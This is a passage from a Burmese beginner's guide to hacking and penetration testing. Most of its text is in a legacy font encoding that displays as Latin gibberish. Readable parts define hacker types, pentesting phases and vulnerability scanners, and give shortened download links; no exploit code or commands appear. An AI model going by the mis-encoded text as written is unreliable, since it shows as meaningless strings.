Basic Hacking Techniques

အမည်ရှိ ယခု စာအုပ်တွင် Hacking နှင့်

ပတ်သက်၍ ဘာကိုမှျ နားမလည်သည့်
ယခုမှ စတင်မည့်သူများအတွက်
Real Basic ကိုသာ ထည့်သွင်းထားပါသည်

Parctical ​ေ လ့လာလိုသူများအတွက်
Grade 3 Hacking စာအုပ်ကို ဖတ်ရှုရန်
လိုအပ်ပါသည်
 aus;Zl;wifvTm

teaEÅmteEÅig;yg;udk OD;xdyfxm;vsuf uRefawmfh\ oifq&m?

jrifq&m? Mum;q&m rsm;ESifhwuG þpmtkyf jzpfajrmufapa&;twGuf
0dkif;0ef;ulnD ay;cJhMuygukefaom rdwfaqGrsm;tm;vHk;? xkwfa0
jzefYcsDay;ygaom aumif;qkom pmayrS pma&;q&m q&m[efokaomf?
0,f,ltm;ay;zwf&IMuygukefaom enf;ynmcspfolrsm;ESifhwuG tjcm;
aus;Zl;wifxdkufoltm;vHk;wdkYtm; aus;Zl;txl;yif wif&SdygaMumif; OD;pGm
azmfjytyfygonfcifAsm/

pma&;ol
 Disclaimer
uRefawmf a&;om;aom Basic Hacking Guide (vG,fulavhvm tajccH
Hacking enf;ynm) pmtkyfonf uRefawmfwdkY EdkifiHwGif rMumrD vdktyfcsufwpfck
jzpfvmrnfh Security ydkif;qdkif&mtwGuf taxmuftyHh&&Sdap&ef Penetration
Tester tjzpf 0goemtavsmuf vkyfaqmifvdkonfh enf;ynm pdwf0ifpm;olrsm;
twGufom &nf&G,fa&;om;xm;jcif;jzpfygonf/
odkYjzpfí þpmtkyfyg taMumif;t&mrsm;ESifh tajccH enf;ynmrsm;onf
Educational Purpose Only omjzpfjyD; rnfonfh Cyber Security Breaches udkrQ
tm;ray;yg/ tu,fí vkyfaqmifyguvnf; þpmtkyfESifh roufqdkifygaMumif;
BudKwif today;tyfygonfcifAsm/

pma&;ol
 DESCRIPTION
pm&Iol enf;ynmcspfoltaygif; r*FvmygcifAsm/ 'Dpmtkyfav;eJY
ywfoufjyD; trSmpm vdkY roHk;EIef;vdkwmaMumifh Description (azmfjycsuf)
taeeJYom xnfhoGif;vdkufyg&ap/ 'Dpmtkyfav;eJY ywfoufjyD; uRefawmfhtaeeJY
BudKwif aqG;aEG;p&mav;awG &SdaewmaMumifh 'DpmrsufESmav;awGudk jyD;qHk;wJhtxd
zwfay;zdkY awmif;qdkyg&apcifAsm/ 'Dpmtkyfav;udk uRefawmf a&;csifaewm tcsdef
awmfawmf MumygjyD/ taMumif;trsdK;rsdK;aMumifh ra&;jzpfcJhygbl;/
tcsdKUuawmh uRefawmfhudk wGef;tm;ay;Muygw,f/ Hacking qdkif&m
pmtkyfav;wpftkyf a&;zdkY taMumif;aygh/ 'gaMumifhyJ uRefawmfh tm;vyfcsdefav;
awGudk tenf;i,fpD zJhjyD; 'Dpmtkyfav;udk a&;jzpfcJhygw,f/ 'Dpmtkyfav;onf
rnfonfh Hacking pmtkyfudkrQ wdkuf&dkuf bmomjyefxm;wJh pmtkyf r[kwfyg/
'Dpmtkyfav; a&;zdkYtwGuf uRefawmfhtaeeJY udk;um;cJhwmawmh &Sdygw,f/
Hacking with Kali (James Broad & Andrew Binder) pmtkyfudk udk;um;cJhwmyg/
Chapter awGudkawmh EC council &JU CEH module awGudk twk,ljyD;
pDpOfcJhygw,f/ usef&SdwJh &Sif;vif;csufawGudkawmh Kali &JU Official Page jzpfwJh
offensive security &JU Documentation awGudk ,loHk;xm;ygw,f/
'Dpmtkyfav; a&;wJhtcgrSm uRefawmfhtwGuf tBuD;rm;qHk; tcuftcJ
awG BuHKcJh&ygw,f/ wpfcku oabmw&m;ydkif;yg/ (uRefawmf wufcJhzl;wJh Online
Training av;wpfck &Sdygw,f/ tcef; wpfckcsif;pDudk oabmw&m;ydkif;csnf;yJ
aqG;aEG;xm;wJh pmtkyf av;tkyfrSm wpftkyfudk pmrsufESm 500 0ef;usif &Sdygw,f/)
'Dae&mrSm uRefawmfhtwGuf tcuftcJu oabmw&m;ydkif;awGudk xnfhoGif;rvm;
z,fxm;rvm; qdkwm pOf;pm;&jcif; jzpfvmygw,f/
pmzwfol tawmfrsm;rsm;onf oabmw&m;ydkif;qdkif&m awGudk zwfzdkY
ysif;Muw,f vdkY uRefawmf xifrdygw,f/ 'gayr,fh tcsdKUaom oabmw&m;ydkif;
awGudk em;rvnfbl;qdk&if (oabmw&m;rygwJh vufawGYonf) wwfajrmufzdkY
cufygw,f/ rjzpfrae em;vnf oifhwJh taMumif;t&mawGudk od&Sdxm;rSomvsif
xdktaMumif;t&mawGay: rlwnf pOf;pm;&r,fh tajctae BuHKvmwJhtcg toHk;cs
Edkifygvdrfhr,f/ 'gaMumifh 'DpmtkyfxJrSm oabmw&m;awGvnf; ygap?
pmrsufESmt&vnf; tqifajyap qdkjyD; twdkcsKyf xnfhoGif;azmfjycsufawG
yg0ifaeygw,f/
'gaMumifh tcsdKUaom ae&mav;awGrSm wpfa,mufrusef oabmayguf
em;vnfwmrsdK; rjzpfbJ usefcsif usefaecJhEdkifwJh tm;enf;csufwpfck
jzpfoGm;ygw,f/ Oyrm ajym&&if Networking eJY ywfoufjyD; od&Sdem;vnf xm;ol
awGu uRefawmf twdkcsKyf ajymjyxm;ayr,fh zwfjyD; em;vnfEdkifayr,fh
networking eJY ywfoufjyD; avhvmxm;rI r&Sdao;olawGuawmh em;vnfzdkY
tenf;i,f BudK;pm;&r,fh tajctaeyg/ tJonftwGuf zwfoifhwJh pmtkyfawG
pdf awGudkvnf; Facebook Secret Group uae qufjyD; wifay;oGm;rSm
jzpfygw,f/ ,ckpmtkyfrSm yg0ifwJh Member Form rSm yHkpHav;jznfhjyD; ay;ydkYjcif;
tm;jzifh Facebook Secret Group udk 0ifa&mufEdkifrSm jzpfygw,f/
'kwd, tcuftcJwpfcku English tac:ta0:av;awGeJY ywfoufwm
yg/ tcsdKUaom a0g[m&awGudk jrefrmvdk ajymjyzdkY rvG,fwJhtwGuf 'Dwdkif;
xm;&ovdk jrefrmvdk ajymjyvdkY &wJh a0g[m&awGtwGufvnf; oHk;av;Budrfavmuf
jrefrmvdkeJY English vdk wGJjyD; azmfjyxm;ygw,f/ aemufydkif;rSm xdk tac:ta0:
awGudk t*FvdyfvdkyJ oHk;ygw,f/ bmaMumifhvJ qdkawmh Vulnerability udk jrefrmvdk
tm;enf;csuf qdkwJhtaMumif; tBudrfBudrf wGJjyD; azmfjyxm;ayr,fh uRefawmfh
oabmt& Vulnerability vdkYyJ ac:apcsifygw,f/ pm&IolawGvnf; tJovdkyJ
rSwfxm;apcsifygw,f/ bmaMumifhvJqdk&ifawmh msf xJrSm vulns vdk
vulnerabilities udk twdkaumuf oHk;&wmrsdK;awG BuHKwwfvdkY jzpfjyD; man awG help
awG azmfMunfhwJhtcgrSmvnf; xdkpum;vHk;awGudk em;vnfapcsifvdkYyg/
'gaMumifh uRefawmf BuHK&wJh 'kwd, tcuftcJonf a0g[m& (tac:
ta0:) ydkif; jzpfvmygw,f/ cke Oyrmtwdkif;yJ aqG;aEG;&&if pmtkyfwpftkyfvHk;rSm
tm;enf;csuf vdkYcsnf;yJ wGifwGif oHk;oGm;vdkY &ayr,fh t*FvdyfpmvHk;awGyJ jrif&wJh
ae&mawGrSm rrSwfrdawmhrSm pdk;rdwmaMumifh jrefrmvdk ac:vdkY &ayr,fhvnf;
t*FvdyfvdkyJ nSyfoHk;vdkufygw,f/ 'gaMumifh t*Fvdyfvdk pum;vHk;av;awG
nyfygaewmudk em;vnfay;MuygvdkY BudKwif yefMum;yg&ap/
'Dpmtkyfav;onf uRefawmfhtwGuf yxrqHk; tawGYtBuHK jzpfygw,f/
'gaMumifh tm;enf;csufawG &SdaeEdkifygw,f/ 'Dpmtkyfav;udk tajccHtjzpf
xkwfa0jcif;om jzpfjyD; Hacking e,fy,fonf us,fajymvGef;wJhtwGuf 'Dpmtkyf
wpftkyfwnf;rSmawmh enf;ynm tm;vHk;udk yg0ifatmif xnfhoGif;vdkufEdkifjcif;
r&SdcJhyg/ Oyrm - SQL Injection vdk tcef;rsdK;awGonf oD;oefY pmtkyf wpftkyf
a&;rSomvsif Manual vkyfaqmifEdkifzdkYtwGuf tqifajyrSm jzpfygw,f/ 'Dpmtkyf
xJrSmawmh tool awGeJY vkyfaqmifwJh tydkif;av;awGom xnfhoGif; aqG;aEG;cJh
Edkifygw,f/
2018 ar vavmufrSm Hacking Tool rsm;udk toHk;jyKjcif; ESifh Hacking
Trick rsm; qdkwJh pmtkyfav; wpftkyf xyfrH xkwfa0oGm;ygr,f/ xdkpmtkyftwGuf
tajccHtjzpf 'Dpmtkyfuav;udk avhvmxm;oifhygw,f/ 'DxJu vkyfaqmifcsuf
awGeJY oabmw&m;awGudk em;vnfvsif twdkif;twmwpfcktxd tajccHynm
vrf;aMumif;ay: ajccsEdkifr,fvdkYawmh ,HkMunfxm;ygw,f/
 'Dpmtkyfav;xJrSm yg0ifwJh taMumif;t&mawGonf uRefawmfh&JU Blog
av; jzpfwJh www.khitminnyo.com rSm a&;om;azmfjy xm;wJh taMumif;t&m
awGudk jyefvnf pkpnf; xkwfxm;jcif;vnf; r[kwfyg/ uRefawmfh&JU blog
av;rSmvnf; avhvmvdkY &r,fh taMumif;t&mav;awGudk pDpOfxm;&Sday;ygw,f/
Kali Linux installer acG jyKvkyfenf;? Kali Linux udk wifjyD; toHk;jyKenf;?
VirtualBox rSm toHk;jyKenf;? Live Mode taeeJY toHk;jyKEdkifzdkY USB stick rSm
xnfhoGif;enf; pwmawGudkvnf; Blog rSm pkpnf;ay;xm;ygw,f/ wifenf;udk
wpfa,mufcsif;pD twGuf uGefysLwm tajctaeay: rlwnfjyD; aqG;aEG;ay;oGm;rSm
jzpfwJhtwGuf BudKwifxm;p&mrvdkygcifAsm/ (wifjyD;om;olawGuawmh jyefvkyfp&m
rvdkavmufyg/ jyefwifzdkY vdk rvdk pwmawGudk aqG;aEG;Edkifygao;w,fcifAsm)
aemufwpfcktaeeJY 'DpmtkyfxJrSm yg0ifwJh Tools/Application awGudk
bit.ly/kmn-app qdkwJh vdyfpmav;udk Browser rSm &dkufxnfhvdkufwmeJY
emrnftvddkuf a'gif;,l&rSmawGudk pkpnf;ay;xm;wJh Page udk a&muf&Sdygr,f/
Latest Version awGcsnf;yJ pkpnf;ay;xm;ygw,f/ tjrJwrf; update version udk
&EdkifzdkYyg/
'Dpmtkyfonf tjcm;aom pmtkyfawGeJY EIdif;,SOfMunfh&if tacG rygygbl;/
tacGvkyfenf; eJY wifenf;awGudkyg rdrdbmom vkyfwwfapzdkY vrf;nTefay;wmu
tacGxnfhoGif;ay;wmxuf ydkjyD; oifhavsmfr,fvdkY xifrdwJhtwGuf jzpfygw,f/
rdrdbmom zefwD;jcif;tm;jzifh xnfhay;wJhtacGudk upgrade jyefvkyf&wmxuf
Updated Version udk &&SdaprSm jzpfygw,f/
uRefawmf 'Dpmtkyfav;udk p a&;pOfrSm Kali Linux onf 2017.1 om
&Sdao;aomfvnf; pmtkyfav; a&;jyD;vdkY 'D azmfjycsufav; a&;aepOfrSm 2017.3
jzpfoGm;ygjyD/ 'gaMumifh rdrdwdkYbmom Updated Version (Latest Version) udk &,l
oHk;pGJwwfzdkYudk ydkjyD; tav;xm;cJhjcif;jzpfygw,f/
azmfjycsufeJYwif tawmf &Snfvsm;oGm;jyDxifygw,f/ ed*Hk;csKyftaeeJY
'DpmtkyfxJu taMumif;t&mawGudk ausmfrzwfzdkY? vdkufvkyfzdkY vdktyfwJh ae&mawG
rSm vdkufvkyfMunfhjyD;rS a&SUqufzwfzdkY eJY avhusifhzdkY vdktyfwJhae&mawGrSm wpfydkif;
rjyD;cif (aocsm rvkyfwwfao;cif) aemufwpfydkif; rqufzdkY pwmav;awGudk
BudKwif rSmMum;&if;eJY 'Dpmtkyfav;eJY ywfoufwJh azmfjycsufav;awGudk
&yfem;yg&apcifAsm/

pma&;ol
acwfrif;ndK
khitminnyo@khitminnyo.com
CHAPTER 1: Introduction to Hacking
1. Hacking qdkwm
Hacking qdkwm bmvJqdkwmawGeJYywfoufjyD; uRefawmfwdkY Budrfzefrsm;pGm
odzl;zwfzl;jyD;jzpfaewmrdkY 'Dae&mrSm vdk&if;awGudkcsnf; azmfjyoGm;ygawmhr,f/
Hacking u ]]hack = ckwfxpfonf/ jzwfawmufonf/}} qdkwJh English Word
wpfckuae qif;oufvmwmjzpfjyD; uGefysLwme,fy,frSmawmh ]]gaining
unauthorized access to data in a system or computer}} vdkY zGifhqdkMuygw,f/
'gaMumifh enf;ynme,fy,frSmawmh Hacking qdkwm[m euf0yf
(odkYr[kwf) uGefysLwm (odkYr[kwf) pepf wpfckck\ cGifhjyKcsufay;rxm;aom
tcGifhta&;udk &,l oHk;pGJjcif;/ wpfenf;tm;jzifh tqdkyg euf0yfjzpfap?
uGefysLwmjzpfap? pepfwpfckckjzpfap twGif;odkY cGifhjyKcsufr&SdbJ 0ifa&mufjcif; vdkY
qdkvdkygw,f/
Cambridge Dictionary t&qdk&ifawmh Hacking qdkwmonf
uGefysLwmpepfwpfckcktwGif; odkavSmifxm;aom tcsuftvufrsm;udk
&,l&efjzpfap? xdkuGefysLwmpepfrsm;twGif; Adkif;&yfrsm; jyefYyGm;ap&efjzpfap ponfh
&nf&G,fcsufrsdK;jzifh uGefysLwmudk w&m;r0if toHk;jyKjcif; vdkY zGifhqdkygw,f/

2. Hacker qdkwm
Hacking udk vkyfaqmifol vdkY tvG,fqHk;ajymvdkY&ygw,f/
pepftrsdK;rsdK;twGif;udk xGif;azmuf0ifa&mufol? tjcm;olawG&JU uGefysLwmpepfawG
xJu ta&;ygwJh information (data) awGudk w&m;r0if &,l^zsufqD;ol?
qufoG,fa&;pepftrsdK;rsdK;udk Mum;jzwfem;axmifol (tcsuftvuf Mum;jzwf&,l
ol) ponfjzifh Hacker udk t"dyÜg,fzGifhqdkMuygw,f/

3. Hacker trsdK;tpm;rsm;
vkyfaqmifyHkeJY cH,lcsufawGay:rlwnfjyD; Hacker awGudk trsdK;tpm;
cGJjcm;Muygw,f/ t"dutkyfpk oHk;pkuawmh Black Hat Hacker, White Hat Hacker
eJY Grey Hat Hacker wdkY jzpfMuygw,f/
Black Hat Hacker awGrSmawmh aumif;rGefus,fjyefYwJh uGefysLwmqdkif&m
todynmawG &SdaeMujyD; olwdkY&JU todynmA[kokwawGudk Internet Security udk
ausmfjzwfcsdK;azmuf (Breach or Bypass) wJhae&mrSm toHk;jyKMuygw,f/ Black
Hat Hacker awGudk Cracker (or) Dark-site-hacker awGvdkYvnf;
ac:qdkMuygao;w,f/ uGefysLwmeJY euf0yfawGxJudk csdK;azmuf0ifa&mufol?
uGefysLwmAdkif;&yfawGudk zefwD; ysHUyGm;apolawG[m Black Hat Hacker awG
jzpfMuygw,f/ olwdkY[m olwdkY&JU vkyfaqmifrIaMumifh wpfbufrSm jzpfoGm;r,fh
qHk;&IH;epfemrIawGudk xnfhawG;avh r&Sdygbl;/ rdrdwdkYtusdK;pD;yGm;udkom MunfhwJh
vkyf&yfawGrsdK; vkyfaqmifavh&SdMuygw,f/ 'gaMumifh Black hat hacker awG[m
pdwfxm;raumif; vkyf&yfraumif;wJh vlqdk;awGvdkY rSwf,lEdkifygw,f/
Black Hat, White hat qdkwmawGu ]]The bad guys usually wore black
hats and the good guys wore white ones.}} qdkwJh taemufwdkif; a&S; qdk&dk;pum;
wpfckuae qif;oufvmwm jzpfygw,f/ oabmu vlaumif;rsm;onf OD;xkyfjzL
aqmif;MujyD; vlqdk;rsm;u OD;xkyfteuf aqmif;Muonf aygh/
White Hat Hacker awGuvnf; Black Hat Hacker awGvdkyJ
uGefysLwmpepfawG&JU tm;enf;csuf ,dkaygufawGudk &SmazGygw,f/ Black Hat
Hacker awGeJY rwlwmuawmh White Hat Hacker awGu &SmawGYvmwJh
tm;enf;csufawGay: tcGifhaumif;,ljyD; wdkufcdkufwmrsdK; rvkyfbJ
tJonftm;enf;csufawGudk b,fvdkjyefvnfjyKjyifjyD; aumif;rGefatmifzefwD;rvJ
qdkwmudk BuHpnfvkyfaqmifygw,f/ olwdkY&JU prf;oyfvkyfaqmifrIaMumifh rnfolYudkrQ
xdcdkufepfemaprIr&Sdapatmif BuHpnfvkyfaqmif&jcif;rdkY White Hat Hacker awG&JU
vkyfaqmif&rIawGu vufawGYrSm ydkcufcJygw,f/ jyD;awmh White Hat Hacker
awG[m pepfwpfckudk prf;oyfppfaq;zdkY vdktyfwJhtcg xdkpepf&JU ydkif&SifxH
cGifhawmif;jyD;rS xdkpepfudk xdcdkufapjcif;r&SdbJ Security t& tm;enf;csufawGudk
&SmazG&ygw,f/ tm;enf;csufawG &SmazGawGY&Sdyguvnf; ydkif&SifxH today;jcif; eJY
umuG,fEdkifrnfh enf;vrf; &SmazGjcif;awGudk vkyfaqmifMuygw,f/
av;pm;twk,lzG,f pdwfxm;eJY vkyf&yfrsm;udk vkyfaqmifMuolawGaygh/
Grey Hat Hacker uawmh white rus Black rus Hacker awG
jzpfygw,f/ Black hat awGvdk pepfawGudkvnf; rzsufqD;Muovdk White Hat
awGvdk ydkif&SifxHcGifhawmif;wmrsdK;vnf; rvkyfwwfMuygbl;/ White Hat awGvdk
cGifhrawmif;&ifawmifrS Black Hat awGvdk pepfawGudk xdcdkufysufpD;aprIr&Sdatmif
vkyfaqmif&ifawmh Grey Hat vnf; rqdk;wJhtxJrSm yg0ifvmEdkifygw,f/ 'gayr,fh
Grey Hat Hacker tawmfrsm;rsm;uawmh rdrdwdkY&JU prf;oyfrIaMumifh wpfbuf
System awG ysufpD;oGm;vnf; *&kpdkufavhr&SdMuygbl;/ 'gaMumifh pmzwfolu
White hat tjzpf r&yfwnfEdkif&ifawmif rdrdprf;oyfrItwGuf wpfzufpepfawG
ysufpD;roGm;apzdkY *&kpdkufvkyfaqmifr,fqdk&ifawmh vlqdk;pm&if;xJrSm yg0ifrSm
r[kwfawmhbl;aygh/
'gawGuawmh Hacker awG&JU cH,lcsufeJY tjyKtrlawGay: rlwnfjyD;
cGJjcm;jcif;om jzpfygw,f/ em;vnfwwfuRrf;rI Skill t& cGJjcm;wmawGvnf;
&Sdygao;w,f/ 'DrSmawmh tJonftaMumif; xnfhoGif;rajymawmhygbl;/
 wu,fvdkYrsm; urÇmay:rSm Hacker awGom &Sdraebl;qdk&if ,aeY
uRefawmfwdkY toHk;jyKaewJh pepfawG[m ckvdk cdkifrmvHkjcHKvmr,frxifygbl;/ Black
Hat hacker awGu tm;enf;csufawG &SmazGwdkufcdkufw,f/ White Hat Hacker
awGu tm;enf;csufawGudk &SmazGumuG,fw,f/ 'Dawmh pepfrsdK;pHktwGuf
aumif;usdK;jyKwJh White Hat Hacker awG[m vdktyfcsufwpf&yf
jzpfvmygawmhw,f/
,aeYacwfudk jyefMunfhr,fqdk&if uRefawmfwdkYEdkifiHrSm tifwmeuf
toHk;jyKrIawG rsm;jym;vmw,f/ uGefysLwm toHk;jyKrIawGeJY uGef,uftoHk;csrIawG?
Website zefwD;toHk;jyKrIawG pwmawG[m vufzuf&nfqdkifupvdkY
ukrÜPDawGtxd wdk;wuftoHk;jyKrIawGudk jrifawGUvm&jyDjzpfygw,f/ tifwmeuf
toHk;jyKrIawG ydkrdkrsm;jym;vmwmeJYtrQ tifwmeufqdkif&m qdkufbmvHkjcHKa&;awG
ta&;ygvmovdk bPfvkyfief;awG? EdkifiHwumeJY ywfoufqufqHwJh aiGay;aiG,l
udpöawGudkawmifrS zkef;av;wpfvHk;ay:uae vkyfaqmifEdkifaewJhacwfrSm
qdkufbm&mZ0wfrIawGvnf; ydkrdkrsm;jym;vmaewmaMumifh Cyber Security &JU
tcef;u@[m tvGefta&;ygvmygw,f/
Hacking udk pdwfr0ifpm;vsifawmifrS rdrdwdkY&JU vHkjcHKa&;twGuf
Knowledge awG &SdzdkY vdktyfvmygawmhw,f/ Hacking udk raumif;wJhtvkyfvdkY
w&m;ao owfrSwf,lqxm;wwfMuwJh tcsdKUaomolawGudk uRefawmfwdkY
ywf0ef;usifrSm jrifawGYzl;Muygvdrfhr,f/ uRefawmfaqG;aEG;cJhovdkygyJ/
aumif;wJhbufrSm toHk;csr,fh hacker awG uRefawmfwdkYEdkifiHrSm ta&;ay:
vdktyfvdkYaeygjyD/ rMumrD umvawGtwGif;rSm rjzpfraevdktyfcsufwpf&yf
jzpfvmygawmhr,f/
Hacking ay: tjrifrMunfolrsm;udk ajymjyvdkwmwpfcku Hacking qdkwm
vufeufwpfckygyJ/ aoewfwpfvuf &Sdw,fqdkygpdkY/ tJonfaoewfu
vlqdk;vufxJrSm &Sdae&if vlaumif;awGtwGuf pdk;&drfpdwfylp&mjzpfaeayr,fh
tJonfaoewfuyJ &JawGvufxJrSm&Sdae&ifawmh vlaumif;awG pdwfylp&m
rvdkawmhygbl;/ aoewfonf vludk aoapEdkifayr,fh xdkaoewfudk
udkifpGJxm;olay:rSm rlwnfjyD; oufa&mufrI uGmjcm;oGm;ygw,f/
'Doabmw&m;twdkif;ygyJ/ Hacking onf aoewfwpfvuf qdkMuygpdkY/
'g[m raumif;wJhtajctaewpfckr[kwfygbl;/ umuG,fa&;bufrSm
toHk;jyKwJhtcg xdkaoewfuyJ tm;vHk;twGuf aumif;usdK;awGudk zefwD;ay;EdkifpGrf;
w,fr[kwfvm;/
CHAPTER 2: Ethical Hacking (or)
Penetration Testing
1.Penetration Testing qdkwm
Ethical Hacking , Penetration Testing eJY White Hat Hacking wdkY[m
ac:a0:oHk;pGJrIjcif; uGJjym;ayr,fh qdkvdk&if;u wlnDMuygw,f/ Hacking udk
vkyfaqmifwJhae&mrSm Ethic qdkwJh udk,fusifhw&m; pHEIef;wpfck aygif;pyfvkduf
wJhtcg Ethical Hacking qdkwm jzpfay:vmygw,f/
Corporation awmfawmfrsm;rsm;[m olwdkY&JU umuG,fa&;twGuf
Security Professional awGudk iSm;&rf;toHk;jyKMuw,f/ umuG,fa&;rSm
tiftm;aumif;apzdkYtwGuf Security control awGudkvnf; xyfrH 0,f,l toHk;jyK
Muavh&Sdygw,f/ 'gayr,fh Skilled hacker awGudk umuG,fEdkifzdkYtwGuf olwdkY&JU
vkyfaqmifcsufawG[m pdwfauseyfp&m&Sdr&Sdqdkwmudk b,folu cdkifrmpGm
qHk;jzwfay;EdkifrvJ/ 'Dae&mrSm Penetration Testing &JU tcef;u@u
ta&;ygwJhae&muae yg0ifvmygawmhw,f/
Penetration Testing (Pen-testing) qdkwm umuG,fa&; r[mAsL[mudk
a&;qGJvkyfaqmifol Security Officer (or) Security Control awGuae usef&pfcJhwJh
vHkjcHKa&;qdkif&m tm;enf;csuf (Security Weakness) udk &SmazGEdkifapzdkYtwGuf
System ay:rSm Attack jyKvkyfMunfhjcif; jzpfygw,f/
xdkodkY Security Assessment jyKvkyfjyD; vkHjcHKa&;t& tm;enf;csufawGudk
&SmazG&mrSm Nessus Vulnerable Scanner udk toHk;jyKEdkifygw,f/ Pro eJY Manager
qdkjyD; version ESpfrsdK;&Sdonfhtjyif &uf 60 pm tcrJh toHk;jyKEdkifcGifh&SdrSmjzpfjyD;
WannaCry, NotPetya eJY tjcm; Ransomware Cyber Attack awGuae
umuG,fwm;qD;Edkifygw,f/ 'ghjyif &SmazGawGY&Sdvmaom tm;enf;csufawGudkvnf;
jyKjyifjyifqifvdkY vG,fulapzdkY taxmuftyHhay;ygw,f/
Nessus udk prf;oyf&,loHk;pGJvdkygu Browser's address bar wGif
bit.ly/nessus-aio [k &dkufxnfhjcif;tm;jzifh Download &,l&efae&modkY
a&muf&SdrnfjzpfjyD; ESpfouf&mAm;&Sif;tvdkuf a'gif;,lEdkifygw,f/
 Nessus Vulnerable Scanner wGif Vulnerable rsm;tm; azmfjyyHk

2. Penetration Testing Types

Penetration Testing vkyfaqmifjcif;onf real attack awGvdk wky
vkyfaqmifjcif;jzpfjyD; t"dutm;jzifh atmufyg &nf&G,fcsufrsdK;awG
xm;&Sdvkyfaqmifygw,f/
1/ wdkufcdkufvmEdkifajc&SdwJh wdkufcdkufrIawGeJY atmifjrifEdkifajcudk qHk;jzwf&ef
2/ wdkufcdkufcH&EdkifwJh tEÅ&m,frBuD;wJh ,dkpdrfhaygufawGeJY tEÅ&m,fBuD;wJh ,dkayguf
awGudk cGJjcm;owfrSwf&ef
3/ tvdktavsmufvkyfaqmifwJh tool awGeJY rawGY&SdEdkifwJh ,dkpdrfhaygufawGudk &SmazG
cGJjcm;&ef
4/ wdkufcdkufrIwpfck jzpfyGm;ygu vkyfief;twGif; rnfrQ xdcdkufEdkifrnfudk qHk;jzwf&ef
5/ umuG,fa&;pepfeJY Security Control awG&JU pGrf;aqmif&nfudk ppfaq;Edkif&ef
6/ vHkjcHKa&;qdkif&m enf;ynmvkyfief;awGrSm &if;ESD;jrSKyfESHvdkol aygrsm;vmapzkdY
oufaocH (ulnDaMumfjimay;rnfhvkyfief;&Sif)udk &SmazG&ef
txufyg &nf&G,fcsufrsm;jzifh Penetration Testing ukd Internally
omru Externally yg vkyfaqmifavh&SdMuygw,f/ vkyfaqmifrIay:rlwnfjyD;
Black-box pentesting, White-box pentesting eJY Grey-box pentesting qdkjyD;
uGJjym;rI&Sdygw,f/ 'Dae&mrSmawmh wpfckpDtaMumif; tao;pdwf raqG;aEG;
awmhygbl;/
Penetration udk vkyfaqmif&mrSm atmufyg tqifh 6qifheJY
vkyfaqmifavh &SdMuygw,f/ ( Penetration Tester awG vkyfaqmifavh&SdwJh tqifh
6qifhaygh/) bmawGvJqdkawmh
1. Information Gathering
2. Footprinting
 3. DNS Enumeration
4. System Fingerprinting
5. Services probing
6. Exploit research wdkY jzpfMuygw,f/
External eJY Internal testing qdkjyD; ESpfrsdK;&SdaMumif; aqG;aEG;cJhjyD;jyDaemf/
Internal Testing qdkwmu twGif;vltaeeJY wdkufcdkufrIudk prf;oyfvkyfaqmif&wm
jzpfygw,f/ External pentesting eJY vkyfaqmif&yHkcsif; wlnDayr,fh uGmjcm;wmu
Attack udk twGif;vltaeeJY jyKvkyf&jcif;rdkY Internal network xJrSm
b,fae&muae pwifr,fqdkwm ydkjyD; odwJhtjyif authorized access vnf;
&&Sdxm;wmrdkY tcsdKUaomtydkif;awGrSm ydkjyD; oufomaprSmjzpfygw,f/
External Attack vkyfaqmif&wJh Attacker uawmh ydkjyD;
cufcJyifyef;rSmjzpf ygw,f/ bmvdkYvJqdkawmh Internal Pen-tester u 'Deuf0yfxJrSm
b,ft&mu ta&;BuD;w,fqdkwm b,fae&mrSmwnf&Sdw,fqdkwmawGudk
odjyD;om;jzpfayr,fh External Attacker uawmh bmwpfckudkrQ rod&ao;bJ
pwifvkyfaqmif&rSm rdkYvdkYygyJ/
External Attacker awGtaeeJY vkyfaqmif&wJh erlemtqifhuav;awGu-
1. Internal Network Scanning
2. Port Scanning
3. System Fingerprinting
4. Service Probing
5. Exploit Research
6. Manual Vulnerability Testing and Verification
7. Manual Configuration Weakness Testing and Verification
8. Firewall and ACL Testing
9. Administrator Privileges Escalation Testing
10. Password Strength Testing
11. Database Security Controls Testing
12.Internal Network Scan for Know Trojans pwmawG jzpfygw,f/
Tool awGudk toHk;jyKjyD;vnf; Penetration Testing udk automate
jyKvkyfEdkifygao;w,f/ manual jyKvkyfwmavmuf wdusaumif;rGefjcif;r&Sdayr,fh
tcsdefeJY resource awGudk oufomapygw,f/ network ay: oufa&mufr,fh
Impact udk avsmhusapEdkifovdk pepfudk xdcdkufysuf,Gif;apEdkifr,fh (human
mistake) rsdK;udkvnf; avsmhenf;apygvdrfhr,f/
Manual Testing &JU tm;omcsufuawmh uRrf;usifydkifEdkifwJh Security
Professional awGu vkyfaqmifjcif; jzpfvdkYygyJ/ tJvdk vkyfaqmifr,fqdk&ifawmh
Planning, attack design eJY scheduling awG owffrSwfxm;zdkY vdktyfygvdrfhr,f/

2. Vulnerability Assessment
'Dtydkif;udkawmh Nexpose vdk tool udk toHk;jyK vkyfaqmifEdkifygw,f/
tm;vHk;od&SdjyD;jzpfwJh Metasploit udk zefwD;cJhonfh Rapid 7 uyJ Develop
jyKvkyfxm;wJh Nexpose [m Vulnerability assessment jyKvkyf&mrSm
tvGeftaxmuftuljyKygw,f/ oifhtaeeJY Nexpose udk prf;oyftoHk;jyKvdkygu
Google rSm nexpose download vdkY &dkuf&Smvdkuf&if tay:qHk;awGU&r,fh link uae
azmifjznfhjyD; a'gif;,lEdkifygw,f/ tcrJh prf;oyfoHk;pGJcGifhumvuawmh &uf 30
jzpfjyD; a&&SnfoHk;vdkygu 0,f,lxm;&rSmjzpfygw,f/
Nexpost u uRsefawmfwdkY&JU Network xJrSm &SdaewJh Device awG&JU
System ydkif;qdkif&m tm;enf;csufawGudk tcsdefwdkav;twGif;rSm &SmazG
azmfjyay;Edkifygw,f/ install jyKvkyfjyD; prf;oyfMunfhygu vG,fulpGm odEdkifwmrdkY
uRsefawmfhtaeeJYuawmh razmfjyvdkawmhyg/ Vulnerability Assessment udk
manual taejzifhvnf; vkyfaqmifEdkifygao;w,f/ prf;oyf&SmazG&r,fh
enf;vrf;awGudkawmh od&Sdxm;&rSmjzpfygw,f/

3. Area of Pentest
vlom;awG&JU qHk;jzwf vkyfaqmifcsuf (human behavior) rygbJawmh
penetration testing udk jyD;qHk;atmifjrifatmif vkyfaqmifEdkifrnfr[kwfyg/
sensitive information awG &&SdzdkYtwGuf taumif;qHk;enf;vrf;uawmh ,HkMunf&
avmufaom olu exploit jyKvkyfjcif;rsdK;yJ jzpfygw,f/ tJvdk
vkyfaqmifEdkifzdkYtwGuf attacker awGu target system xJrSm &SdaewJh 0efxrf;awG
udk toHk;csEdkifzdkY BudK;pm;wwfMuygw,f/
